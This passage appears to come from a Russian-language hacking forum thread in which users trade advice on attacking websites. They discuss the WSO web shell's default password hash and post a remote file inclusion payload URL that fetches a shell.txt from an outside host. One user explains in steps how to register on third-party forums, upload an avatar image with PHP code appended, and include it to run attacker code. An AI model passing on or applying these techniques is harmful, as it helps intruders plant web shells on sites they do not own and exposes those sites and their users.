а там пароль по умолчанию не знаю ( только есть хэш: 63a9f0ea7bb98050796b649e85481845

а зачем папка WSOmanager ? там что ?
кстати, а как тогда направить инклюд, если этот шелл требует авторизацию?
темно как то мне ....

root пароль, там комент должен быть:
63a9f0ea7bb98050796b649e85481845 // root
как то так, не помню точно.
И хватит оффтопить в теме.

index.php?page=http://nabstre.tu2.ru/shell.txt? вот почему в конце ? никак не пойму,
если можно то плиссс с примером исходного кода

http://forum.antichat.ru/thread23501.html

см Примечания к перовму разделу

Бум, елементарный пример:

прочел на форуме одном

можете подробней описать сей процесс ? ни как дойти не может

Смотри... У тебя есть локальный инклуд. Твоя задача - подставить туда такой файл, чтобы выполнялся твой код. Ищешь какие-нибудь форумы, cms'ки и т.д. Регаешься там. И заливаешь туда картинку как аватарку. Но до этого в конец этой картинки вставляешь свой код. Таким образом, проинклудив эту аватарку, у тебя есть выполняется твой evil-code.

Вот так я вижу gif-ку с блокнота.

??

Принцип работы уязвимости понял. С картинкой вопрос только. Че да как редактировать.

а что не ясного то?

открыл блокнотом, запихнул, сохранил.